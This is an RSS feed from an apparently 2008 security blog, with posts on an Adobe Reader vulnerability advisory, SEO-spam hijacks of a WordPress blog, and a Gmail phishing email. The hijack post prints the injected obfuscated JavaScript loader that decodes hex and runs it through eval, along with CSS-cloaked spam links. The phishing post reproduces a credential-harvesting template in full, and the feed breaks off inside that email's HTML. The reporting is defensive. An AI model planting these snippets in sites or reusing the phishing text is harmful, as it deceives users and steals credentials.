<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>Kakkoi &#187; Exploit</title>
	<atom:link href="http://42.kaizeku.com/taxonomy/exploit//feed/" rel="self" type="application/rss+xml" />
	<link>http://42.kaizeku.com</link>
	<description>web development, software, windows tips and trick</description>
	<pubDate>Sat, 12 Jul 2008 15:10:01 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6</generator>
	<language>en</language>
	<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>Adobe Acrobat, Acrobat 3D &#038; Reader Multiple Vulnerabilities</title>
		<link>http://42.kaizeku.com/security/exploit/acrobat-reader-remote-exploit-buffer-overflow-vulnerability-apsa08-01/</link>
		<comments>http://42.kaizeku.com/security/exploit/acrobat-reader-remote-exploit-buffer-overflow-vulnerability-apsa08-01/#comments</comments>
		<pubDate>Sat, 09 Feb 2008 14:35:38 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Acrobat Reader]]></category>

		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[acrobat]]></category>

		<category><![CDATA[acrobat3d]]></category>

		<category><![CDATA[adobe+reader]]></category>

		<category><![CDATA[buffer+overflow]]></category>

		<category><![CDATA[reader]]></category>

		<category><![CDATA[remote+exploit]]></category>

		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/security/exploit/acrobat-reader-remote-exploit-buffer-overflow-vulnerability-apsa08-01/</guid>
		<description><![CDATA[One of the methods exposed allows direct control over low level features of the object, which in turn allows execution of arbitrary code. The code will run with the privileges of the target user opening the PDF document.]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/02/adobe_reader_7.png' alt='adobe reader' longdesc="http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/02/adobe_reader_7.png" width="110" height="110" title="Adobe Reader" class="photo thumb- fl" />A JavaScript <a class="exturl icn-r1" href="http://en.wikipedia.org/wiki/Buffer_overflow">Buffer Overflow</a> in <strong class="fw-"><a href="http://www.adobe.com/products/acrobat/">Adobe Acrobat</a></strong>, <strong class="fw-"><a href="http://www.adobe.com/products/acrobat3d/">Acrobat 3D</a></strong> &#038; <strong class="fw-"><a href="http://www.adobe.com/products/reader/">Reader</a></strong> allowed remote attacker to execute arbitrary code. The code will run with the privileges of the target user opening the PDF document. </p>
<p>Excerpt from <em>iDefense </em>Public Advisory;</p>
<blockquote cite="http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=656"><p class="cite">Adobe Reader and Acrobat implement a version of JavaScript in the EScript.api plug-in which is based on the reference implementation used in Mozilla products. One of the methods exposed allows direct control over low level features of the object, which in turn allows execution of arbitrary code.</p>
</blockquote>
<h2>Workaround</h2>
<p>Disabled Adobe Reader &#038; Acrobat JavaScript. Perform Update &darr;</p>
<h2>Update -Adobe Acrobat &#038; Reader version 8.1.2 </h2>
<p>Adobe released version 8.1.2 of Adobe Reader, Acrobat &#038; Acrobat 3D to address<br />
these vulnerabilities.</p>
<ul class="xoxo exturl">
<li><a href="http://www.adobe.com/go/getreader" title="Download Adobe Reader 8.1.2">Adobe Reader 7 and 8 users update to Adobe Reader 8.1.2</a></li>
<li><a href="http://www.adobe.com/support/downloads/detail.jsp?ftpID=3849" title="Download Acrobat 8.1.2 for Windows">Acrobat 8 users on Windows update to Acrobat 8.1.2</a></li>
<li><a href="http://www.adobe.com/support/downloads/detail.jsp?ftpID=3856" title="Download Acrobat 8.1.2 for Mac">Acrobat 8 users on Macintosh update to Acrobat 8.1.2</a></li>
<li><a href="http://www.adobe.com/support/downloads/detail.jsp?ftpID=3850" title="Acrobat 3D version 8 users on Windows update to Acrobat 3D version 8.1.2">Acrobat 3D version 8 users on Windows update to Acrobat 3D version 8.1.2</a></li>
</ul>
<p class="mgt">These <a href="http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=656" class="exturl icn-r1" >vulnerabilities</a> were discovered by <span class="vcard"><a href="http://labs.idefense.com/" class="url fn microformat icn-r1"><span class="give-name">Greg </span> <span class="family-name">MacManus</span></a> of <span class="org"><a href="http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=655">VeriSign iDefense Labs</a></span></span>. </p>
<p><span id="more-194"></span></p>
<h2>Related Posts</h2>
<ul class="xoxo exturl">
<li><a class="inturl" href="/windows/how-to-safely-removed-acrord32infoexe-adobe-reader/" title="How to safely remove AcroRd32Info.exe">How to safely remove AcroRd32Info.exe (Adobe Reader)</a></li>
</ul>
<h2 class="mgt">External <span class="rgb-hblue">Links</span></h2>
<ul class="xoxo exturl">
<li><a href="http://www.adobe.com/support/security/advisories/apsa08-01.html" title="Security update available for Adobe Reader and Acrobat 8">Security update available for Adobe Reader and Acrobat 8 (APSA08-01)</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/exploit/acrobat-reader-remote-exploit-buffer-overflow-vulnerability-apsa08-01/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II</title>
		<link>http://42.kaizeku.com/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/</link>
		<comments>http://42.kaizeku.com/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/#comments</comments>
		<pubDate>Thu, 31 Jan 2008 17:07:22 +0000</pubDate>
		<dc:creator>chaoskaizer.myopenid.com</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[Blackhat]]></category>

		<category><![CDATA[Bluehost]]></category>

		<category><![CDATA[BotNet]]></category>

		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[goro+spam]]></category>

		<category><![CDATA[HostMonster]]></category>

		<category><![CDATA[localrank]]></category>

		<category><![CDATA[matt+heaton]]></category>

		<category><![CDATA[networm]]></category>

		<category><![CDATA[remote+injection]]></category>

		<category><![CDATA[script+injection]]></category>

		<category><![CDATA[spamdexing]]></category>

		<category><![CDATA[sybil+attack]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/</guid>
		<description><![CDATA[Being Hacked by SEO spammer is like a yearly events at Mattheaton.com. Bluehost CEO WordPress blog was first hijacked 2 months ago on 26 November 2007 (according to my record). You can digg my earlier post at  &#8594; Matt Heaton BlueHost HostMonster CEO Official Blog Hacked.]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/03/wordpress-blackhat-seo-spam.png' alt='wordpress-blackhat-seo-spam.png image by chaoskaizer' width="128" height="128" longdesc="http://blog.kakkoi.net/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/" class="photo thumb- fl" />Being Hacked by SEO spammer is seem like a yearly events at <span class="vcard"><a href="http://mattheaton.com" class="url fn microformat icn-r1">Mattheaton.com</a></span>. Matt&#8217;s WordPress blog was first hijacked 2 months ago on 26 November 2007 (according to my record). You can digg my earlier post at &rarr; <a href="/wordpress/bluehost-hostmonster-ceo-blog-got-hacked/">Matt Heaton BlueHost HostMonster CEO Official Blog Hacked</a>.</p>
<p>It&#8217;s a big embarrassment for <a rel="nofollow" class="exturl icn-r1" href="http://www.bluehost.com">bluehost</a> &#038; <a rel="nofollow" href="http://www.hostmonster.com" class="exturl icn-r1">hostmonster</a> hosting to have their CEO&#8217;s blog being spamride every year (since 2007) . Drilling Matt Heaton&#8217;s with bad ads wont solves the Blackhat Spam issues, I will left that particulars part to my readers to speculate.</p>
<p><span id="more-156"></span></p>
<h2 class="cb mgt">Mattheaton Goro Spam Chronology</h2>
<table>
<thead>
<tr>
<th>Date</th>
<th>Event</th>
</tr>
</thead>
<tbody>
<tr>
<td><small>Jul 2007</small></td>
<td> Google PR 7</td>
</tr>
<tr>
<td><small>Aug 2007</small></td>
<td> Stop being Index by <a rel="nofollow" class="exturl icn-r1" href="http://web.archive.org/web/*/http://www.mattheaton.com">archive.org</a></td>
</tr>
<tr>
<td><small>Nov 28th 2007</small></td>
<td> <strong class="fw-">Wordpress.net.in</strong> Goro Spam on wp_footer backlink to <a class="exturl icn-r1" href="http://www.howardowens.com/">howardowens.com</a></td>
</tr>
<tr>
<td><small>Dec 4th 2007</small></td>
<td>Unknown Goro Spam on wp_head backlink to <a href="http://tangonoticias.com/" class="exturl icn-r1">tangonoticias.com</a></td>
</tr>
<tr>
<td><small>Dec 11th 2007</small></td>
<td>Wordpress Upgrade to version 2.3.1</td>
</tr>
<tr>
<td><small>Jan 16th, 2008</small></td>
<td>Google PR5</td>
</tr>
<tr>
<td><small>Jan 26th, 2008</small></td>
<td>Unknown Blackhat SEO spam on wp_head backlink to <a href="http://www.brainware-india.com/" rel="nofollow" class="exturl icn-r1">brainwave-india.com</a></td>
</tr>
<tr>
<td><small>Feb 3rd, 2008</small></td>
<td>Unknown Blackhat SEO spam on wp_head backlink to <a href="http://www.thinkingphp.org/" rel="nofollow" class="exturl icn-r1">thinkingphp.org</a></td>
</tr>
<tr>
<td><small>Feb 8th, 2008</small></td>
<td>Unknown uusing CSS cloacking method on wp_head backlink to <a href="http://www.zoorender.com/" rel="nofollow" class="exturl icn-r1">zoorender.com</a></td>
</tr>
<tr>
<td><small>Feb 13th, 2008</small></td>
<td>Unknown using CSS cloacking method on wp_head backlink to <a href="http://blog.jensfranke.com/" class="exturl icn-r1">blog.jensfranke.com</a></td>
</tr>
<tr>
<td><small>Feb 20th, 2008</small></td>
<td>Unknown using CSS cloacking method on wp_head backlink to <a href="http://www.entrepreneur27.org/" class="exturl icn-r1">entrepreneur27.org</a></td>
</tr>
<tr>
<td><small><a type="text/plain" href='/wp-content/uploads/2008/02/mattheaton-com-022408.txt' title='mattheaton-com-022408.txt'>Feb 24th, 2008</a></small></td>
<td>Unknown using CSS cloacking method on wp_head backlink to <a href="http://www.latenightpc.com/" class="exturl icn-r1" title="www.latenightpc.com">latenightpc.com</a></td>
</tr>
<td><small><a type="text/plain" href='/wp-content/uploads/2008/02/mattheaton-com-022608.txt' title='mattheaton-com-022608.txt'>Feb 26th, 2008</a></small></td>
<td>Unknown using CSS cloacking method on wp_head backlink to <a href="http://www.communitynext.com" class="exturl icn-r1" title="www.communitynext.com">communitynext.com</a></td>
</tr>
</tbody>
</table>
<h2 class="cb mgt mgb-">Wordpress.net.in GORO Spam Pattern</h2>
<ul class="xoxo exturl pdt">
<li>All the infected sites will stop being index by archive.org few months before the spam started.</li>
<li>From Nov 2007 to Jan 2008 (Right after Google Mass <abbr title="pay-per---post"> P3</abbr> De-rank fever) - The Blackhat Goro Spammer is targeting PR6 &#038; PR7 sites running on WordPress (2.3.1 below) and on some rare case (tangonoticias.com) Joomla CMS (1.0.x)</li>
<li>I categorize this blackhat method as <a href="http://en.wikipedia.org/wiki/Sybil_attack">Sybil Attack</a><br />
<blockquote cite="http://en.wikipedia.org/wiki/Reputation_system"><p class="quote">A Sybil attack is one in which an attacker subverts the reputation system by creating a large number of pseudonymous entities, and using them to gain a disproportionately large influence. A reputation system&#8217;s vulnerability to a Sybil attack depends on how cheaply Sybils can be generated, the degree to which the reputation system accepts input from entities that do not have a chain of trust linking them to a trusted entity, and whether the reputation system treats all entities identically.</p>
</blockquote>
<p>- Derank and manipulate their victim host to boost their pharmaceutical products on Google Local Search Index (gaming Localrank for better SERP) </li>
<li>Goro signatures:
<ol>
<li>html div with id &#8220;goro&#8221;
<pre class="smallbox">&lt;div id=&quot;goro&quot;&gt; &lt;a href=&quot;&gt;...&lt;/a&gt; &lt;/div&gt;
</pre>
</li>
<li>javascript function name &#8220;getme()&#8221;
<pre class="smallbox">&lt;script type=&quot;text/javascript&quot;&gt;function getme(str){ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ''; var i = 1; for (++idx; idx &lt; len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str); }getme('http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306'); &lt;/script&gt;
</pre>
</li>
<li>Output spam on WordPress wp_footer &#038; wp_head hook</li>
</ol>
</ul>
<h2>Blackhat SEO Spamdexing Google Local Search Index</h2>
<p>The below graph explain the Blackhat SEO Spamdexing methods for Manipulating Google Local SERP.</p>
<h3 class="title-">View Spamdexing Google Local Search Image</h3>
<div id="spamdexing-google-local-search" class="dn">
<img src='/wp-content/uploads/2008/01/mattheaton-comeback.png' alt='spamdexing-google-localsearch.png' class="mgb ta-c" width="500" height="800" /></p>
<p class="notice cb mgt">Note: A blackhat at hoqwarts ;)</p>
</div>
<h2 class="cb mgb-">ScreenGrab</h2>
<ul class="xoxo pdt exturl">
<li><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/01/mattheatoncom-jan-08.png' title='screenshot of mattheaton.com on january 2008' type="image/png" class="icn-">mattheaton.com Jan 28 2008</a> <small>(1009 x 6576 pixels)</small></li>
<li><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/01/levitra-tagging-googlebot.png' title='brainwave-india hacked by goro' type="image/png" class="icn-">brainwave-india.com Jan 28 2008</a> <small>(1016 x 2306 pixels)</small></li>
<li><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/01/localsearch.png' title='Spamdexing Google Localsearch' type="image/png" class="icn-">Google Local Search Jan 28 2008</a> Spamdexing Results</li>
<li><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/01/10mg-levitra.png' title='stc-israel.org.il spamdexing google localsearch' type="image/png" class="icn-">stc-israel.org.il Jan 28 2008</a> spamdexing page (hidden text)</li>
<li><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/01/10mg-levitra-white.png' title='stc-israel.org il spamdexing google localsearch' type="image/png" class="icn-">stc-israel.org.il Jan 28 2008</a> spamdexing page (text reveal)</li>
</ul>
<h2 class="cb mgt mgb">Recent Update</h2>
<ul class="xoxo r">
<li><span class="fw">Feb 1, 2008</span> - we send a letter to <span class="vcard"><a href="mailto:matt@bluehost.com" class="url fn email microformat icn-l">matt@bluehost.com</a></span> regarding this issue. Still waiting for his replies</li>
<li><span class="fw">Feb 3, 2008</span> - The Blackhat Goro Spammer change their target spamhost from <a href="http://www.brainwave-india.com" class="exturl icn-r">http://www.brainwave-india.com</a> <small>(PR6)</small> to <a href="http://www.thinkingphp.org" class="exturl icn-r">http://www.thinkingphp.org</a> <small>(PR6)</small> - <span class="vcard"><a href="http://www.fg-webdesign.de/en/" class="url fn microformat icn-l">Felix Geisend&#246;rfer</a></span>.
<pre class="smallbox">&lt;div id=&quot;goro&quot;&gt;&lt;a href=&quot;http://www.thinkingphp.org/?read=796 ... prescription&lt;/a&gt;&lt;/div&gt;&lt;script type=&quot;text/javascript&quot;&gt;function getme(str){ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ''; var i = 1; for (++idx; idx &lt; len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str); }getme('http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306'); &lt;/script&gt;</pre>
<p><strong>thinkingphp.org</strong> blog is running on <em>WordPress 2.3.2</em>. We send him email regarding the <strong class="fw-">Goro Spam hijack</strong>.
</li>
<li id="feb8"><span class="fw">Feb 8th 2008</span>, There is no signature of Goro spam (tag with id goro) on Matt&#8217;s blog the blackhat is now using <em>Inline CSS Position Overflow </em> to hide the spams links &darr; redirect to <a href="http://www.zoorender.com" class="exturl icn-r1">zoorender.com</a> <small>(PR6)</small>.
<pre class="smallbox">&lt;div style=&quot;left: -2227px; position: absolute; top: -3337px&quot;&gt;&lt;a href=&quot;http://www.zoorender.com/?discount=1776&quot;&gt;buying .. &lt;/div&gt;
</pre>
</li>
<li id="feb13"><span class="fw">Feb 13th 2008</span>, Same methods as above (inline css cloacking) .
<ul>
<li>HTML Code shown to a Regular Browser &rarr; 32,246 characters</li>
<li>HTML Code shown to Google Bot &rarr; 34,646 characters</li>
</ul>
<p>redirect to <a href="http://blog.jensfranke.com/" class="exturl icn-r1">blog.jensfranke.com</a> <small>(PR7)</small>.</p>
<pre class="smallbox">&lt;div style=&quot;left: -2227px; position: absolute; top: -3337px&quot;&gt;&lt;a href=&quot;http://blog.jensfranke.com/?read=606&quot;&gt;buy generic fi
</pre>
</li>
<li id="feb20"><span class="fw">Feb 20th 2008</span>, CSS Cloacking redirect to <a href="http://http://www.entrepreneur27.org/" class="exturl icn-r1">http://www.entrepreneur27.org/</a> <small>(PR6)</small>.
<pre class="smallbox">
&lt;div style=&quot;left: -2227px; position: absolute; top: -3337px&quot;&gt;&lt;a href=&quot;http://www.entrepreneur27.org/?more=1591&quot;&gt;bad side effects of viagra&lt;/a&gt;&amp;nbsp;&lt;a href=&quot;http://www.entrepreneur27.org/?more=1592&quot;&gt; ...
&lt;/div&gt;
</pre>
<li id="feb-24-08"><span class="fw">Feb 24th 2008</span>, CSS Cloacking redirect to <a href="http://www.latenightpc.com/" class="exturl icn-r1" title="latenightpc.com">http://www.latenightpc.com</a> <small>(PR5)</small>. <small><a type="text/plain" href='/wp-content/uploads/2008/02/mattheaton-com-022408.txt' title='mattheaton-com-022408.txt'>mattheaton-com-022408-source.txt</a></small></li>
<li id="feb-26-08"><span class="fw">Feb 26th 2008</span>, CSS Cloacking redirect to <a href="http://www.communitynext.com/" class="exturl icn-r1" title="www.communitynext.com">http://www.communitynext.com/</a> WordPress 2.3.3 <small>(PR6)</small>. <small><a type="text/plain" href='/wp-content/uploads/2008/02/mattheaton-com-022608.txt' title='mattheaton-com-022608.txt'>mattheaton-com-022608-source.txt</a></small>
</li>
</ul>
<h2 class="mgt mgb-">Related Posts</h2>
<ul class="xoxo pdt exturl">
<li><a class="inturl" href="/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/" title="How to Removed wordpress.net.in Spam Injection"> How to Removed wordpress.net.in Spam Injection</a></li>
<li><a class="inturl" title="Matt Heaton BlueHost HostMonster CEO Official Blog Hacked" href="/wordpress/bluehost-hostmonster-ceo-blog-got-hacked/">Matt Heaton BlueHost HostMonster CEO Official Blog Hacked</a></li>
</ul>
<h2 class="cb mgt">External <span class="rgb-hblue">Links</span></h2>
<ul class="xoxo exturl">
<li><a rel="robots-no-follow" href="http://blog.kakkoi.net/uri/d3d3Lm1hdHRoZWF0b24uY29t.curie,80,302" title="Bluehost and Hostmonster CEO Blog">Bluehost &#038; Hostmonster CEO&#8217;s Blog</a></li>
<li><a rel="robots-no-follow" href="http://blog.kakkoi.net/uri/bnZkLm5pc3QuZ292L252ZC5jZm0_Y3ZlbmFtZT1DVkUtMjAwNi00NzQz.curie,80,302" rel="external nofollow robots-nofollow" rev="nvd:cve2006-4743" class="curie" title="National Vulnerabilities Database CVE 2006-4743">National Vulnerabilities Database (NVD) on Wordpress 2.0 > 2.0.5 vulnerabilities</a></li>
<li><a href="http://en.wikipedia.org/wiki/Spamdexing">Wikipedia &#8594; Spamdexing</a></li>
<li><a href="http://pseudo-flaw.net/log/20/more-random-wordpress-blogs-and-al-gore-owned-by-seo-spammers">pseudo-flaw - more random wordpress blogs owned by seo spammers</a>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Email Phishing and Spams Trends - Be wary</title>
		<link>http://42.kaizeku.com/security/vulnerability/email-phising-and-spam-trends/</link>
		<comments>http://42.kaizeku.com/security/vulnerability/email-phising-and-spam-trends/#comments</comments>
		<pubDate>Tue, 11 Dec 2007 14:09:28 +0000</pubDate>
		<dc:creator>Avice De'veréux</dc:creator>
		
		<category><![CDATA[Gmail]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[email]]></category>

		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[Google]]></category>

		<category><![CDATA[jpeg+exploit]]></category>

		<category><![CDATA[microsoft]]></category>

		<category><![CDATA[millw0rm]]></category>

		<category><![CDATA[phishing]]></category>

		<category><![CDATA[tiff+exploit]]></category>

		<category><![CDATA[vx+heavens]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/vulnerability/email-phising-and-spam-trends/</guid>
		<description><![CDATA[<p><img src='http://gmodules.com/ig/proxy?url=http://www.shareapic.net/preview2/004669852.gif' alt='Google Gmail Logo' class="fl" width="130" height="54" />Below is typical phishing email I received on <cite style="background:#ffd;color:#000;padding: 1px 3px">Dec 8, 2007</cite>. It was send to one of my active gmail accounts. </p>

<dl class="xoxo r cb" style="list-style-type:none;width:98%;margin: 18px auto;border:1px solid #eee;padding:10px">
<dd>
<h2 class="cb" style="margin-top:9px;border-bottom: 1px solid #ccc">The Email Header</h2>
	<dl id="phising-email" class="profile cf cb">
	<dt class="fl cl" style="width:50px">From</dt>
	<dd><strong style="font-weight:400">"Gmail Team" &#60;customercareteamalert4@gmail.com&#62;</strong></dd>
	<dt class="fl cl" style="width:50px">Subject</dt>
		<dd><strong style="font-weight:400">Gmail Warning!!!! Verify Your Gmail Account To Avoid Close</strong>.</dd>
	<dt class="cl" style="border-top:1px solid#ccc;padding:9px 0px;margin-top:4px">Part of the message &#8595;</dt>
	<dd><blockquote cite="http://gmail.com/">
	<p> 
	Dear member,<br/>
	This message is from gmail message center to all gmail free account owners
	and premium account owners. We are currently upgrading our data base and
	e-mail account center. We are deleting all unused gmail account to create
	more space for new accounts.
	
	 *To prevent your account from closing, you will have to verify it below so
	that we will know that it's a present used account.*
	
	* CONFIRM YOUR IDENTITY. VERIFY YOUR FREE GMAIL ACCOUNT NOW !!! [...]</p>
	</blockquote>
	</dd>
	</dl>
</dd>
</dl>]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://gmodules.com/ig/proxy?url=http://www.shareapic.net/preview2/004669852.gif' alt='Google Gmail Logo' class="fl" width="130" height="54" />Below is typical phishing email I received on <cite style="background:#ffd;color:#000;padding: 1px 3px">Dec 8, 2007</cite>. It was send to one of my active gmail accounts. </p>
<p><span id="more-78"></span></p>
<dl class="xoxo r cb" style="list-style-type:none;width:511px;margin: 18px auto;border:1px solid #eee;padding:10px">
<dd>
<h2 class="cb" style="margin-top:9px;border-bottom: 1px solid #ccc">The Email Header</h2>
<dl id="phising-email" class="profile cf cb">
<dt class="fl cl" style="width:50px">From</dt>
<dd><strong style="font-weight:400">&#8220;Gmail Team&#8221; &lt;customercareteamalert4@gmail.com&gt;</strong></dd>
<dt class="fl cl" style="width:50px">Subject</dt>
<dd><strong style="font-weight:400">Gmail Warning!!!! Verify Your Gmail Account To Avoid Close</strong>.</dd>
<dt class="cl" style="border-top:1px solid#ccc;padding:9px 0px;margin-top:4px">Part of the message &darr;</dt>
<dd>
<blockquote cite="http://gmail.com/">
<p>
Dear member,<br/><br />
This message is from gmail message center to all gmail free account owners<br />
and premium account owners. We are currently upgrading our data base and<br />
e-mail account center. We are deleting all unused gmail account to create<br />
more space for new accounts.</p>
<p> *To prevent your account from closing, you will have to verify it below so<br />
that we will know that it&#8217;s a present used account.*</p>
<p>* CONFIRM YOUR IDENTITY. VERIFY YOUR FREE GMAIL ACCOUNT NOW !!! [...]</p>
</blockquote>
</dl>
<h3 class="cb">Raw Email Content</h3>
<p>This are part of of the raw message on gmail its not download via pop3. Certain meta info is not available as its got filtered by gmail services (spam automatic removal). </p>
<pre style="460px;height:300px;overflow:auto;border:1px solid #ccc">
Delivered-To random-victims-name@gmail.com
Received: by 10.114.235.19 with SMTP id i19cs230694wah;
 Sat, 8 Dec 2007 04:27:12 -0800 (PST)
Received: by 10.141.20.7 with SMTP id x7mr3231780rvi.1197116792300;
 Sat, 08 Dec 2007 04:26:32 -0800 (PST)
Received: by 10.141.115.15 with HTTP; Sat, 8 Dec 2007 04:26:32 -0800 (PST)
Message-ID: &lt;2f83b9150712080426n4a018c86mc2af4a4ed271f223@mail.gmail.com&gt;
Date: Sat, 8 Dec 2007 13:26:32 +0100
From: &quot;Gmail Team&quot; &lt;customercareteamalert4@gmail.com&gt;
Reply-To: customercareteamalert2@gmail.com
Subject: Gmail Warning!!!! Verify Your Gmail Account To Avoid Close.
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=&quot;----=_Part_11145_31274162.1197116792293&quot;

------=_Part_11145_31274162.1197116792293
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

 Dear Member*,* **
 * Account Alert*
***
 *
 *VERIFY YOUR GMAIL ACCOUNT NOW TO AVOID CLOSE !!!*
***GMAI L
*Dear Member*,*
 This message is from gmail message center to all gmail free account owners
and premium account owners. We are currently upgrading our data base and
e-mail account center. We are deleting all unused gmail account to create
more space for new accounts.

 *To prevent your account from closing, you will have to verify it below so
that we will know that it's a present used account.*

* CONFIRM YOUR IDENTITY. VERIFY YOUR FREE GMAIL ACCOUNT NOW !!!

 &lt;http://amazon.com/&gt;
 Gmail! ID:.........................

 Password:........................

 Your Birthday:.................

 Your Country or Territory:...........
 Enter the Security
Characters:......... [image: Registration
Verification Code]
*

 *Warning!!! **Account owner that refuses to update his or her account
before two weeks of receiving this warning will lose his or her account
permanently. *
**
*Sincerely,*
*Gmail Team*

------=_Part_11145_31274162.1197116792293
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

&lt;table style=&quot;WIDTH: 595px; HEIGHT: 813px&quot; width=&quot;595&quot; border=&quot;0&quot;&gt;
&lt;tbody&gt;
&lt;tr bgcolor=&quot;#cccc99&quot;&gt;
&lt;td valign=&quot;center&quot; colspan=&quot;3&quot;&gt;&lt;font face=&quot;Arial,Helvetica&quot; color=&quot;#333300&quot; size=&quot;+0&quot;&gt;&lt;span style=&quot;FONT-SIZE: 13px; FONT-FAMILY: Arial&quot;&gt;Dear&amp;nbsp;&lt;font size=&quot;3&quot;&gt;Member&lt;/font&gt;&lt;strong&gt;,&lt;/strong&gt;&lt;/span&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td colspan=&quot;3&quot;&gt;&lt;font face=&quot;Arial,Helvetica&quot; size=&quot;-1&quot;&gt;
&lt;div align=&quot;center&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;span style=&quot;FONT-SIZE: 13px; FONT-FAMILY: Arial&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;span style=&quot;FONT-SIZE: 23px; FONT-FAMILY: Arial&quot;&gt;&lt;b&gt;&lt;font color=&quot;#dd6600&quot;&gt;
&lt;img style=&quot;WIDTH: 430px; HEIGHT: 99px&quot; height=&quot;330&quot; src=&quot;http://www.google.com/intl/en/press/images/logos/gmail.jpg&quot; width=&quot;418&quot;&gt;&lt;/font&gt;&lt;/b&gt;&lt;/span&gt;&lt;/font&gt;&lt;/font&gt;&lt;/span&gt;&lt;/font&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot;&gt;
&lt;div&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;span style=&quot;FONT-SIZE: 13px; FONT-FAMILY: Arial&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;span style=&quot;FONT-SIZE: 23px; FONT-FAMILY: Arial&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;font color=&quot;#ff0000&quot;&gt;
&amp;nbsp;Account Alert&lt;/font&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;/font&gt;&lt;/font&gt;&lt;/span&gt;&lt;/font&gt;&lt;/div&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;span style=&quot;FONT-SIZE: 13px; FONT-FAMILY: Arial&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;span style=&quot;FONT-SIZE: 23px; FONT-FAMILY: Arial&quot;&gt;&lt;strong&gt;
&lt;/strong&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;font face=&quot;Arial&quot; color=&quot;#ff0000&quot;&gt;&lt;/font&gt;&lt;/u&gt;&lt;br&gt;&amp;nbsp; &lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/span&gt;&lt;/font&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot;&gt;
